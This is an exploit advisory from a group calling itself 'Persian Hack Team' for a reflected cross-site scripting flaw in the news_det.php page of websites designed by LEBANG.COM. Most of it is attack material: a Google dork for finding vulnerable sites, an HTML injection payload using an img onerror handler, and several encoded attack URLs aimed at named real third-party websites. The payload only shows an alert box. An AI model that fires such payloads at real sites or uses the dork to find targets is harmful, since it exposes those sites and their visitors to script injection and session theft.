######################
# Exploit Title : Designed By LEBANG.COM Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.lebang.com/
# Google Dork : intext:"LEBANG.COM" news_det.php?
# Date: 2016/02/05
######################
# PoC:
# id=[XSS]
# Payload = "><img onerror=alert(1) src="asd">
#
# http://huohuasai.h02.66571.com/en/news_det.php?cid=6&id=31%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://www.qjzl.com/news_det.php?id=22%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://www.hnlingkang.com/news_det.php?id=254%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E&classid=15
# http://www.zjbsled.com/news_det.php?cid=10&id=85%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://huohuasai.h02.66571.com/en/news_det.php?cid=6&id=31%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################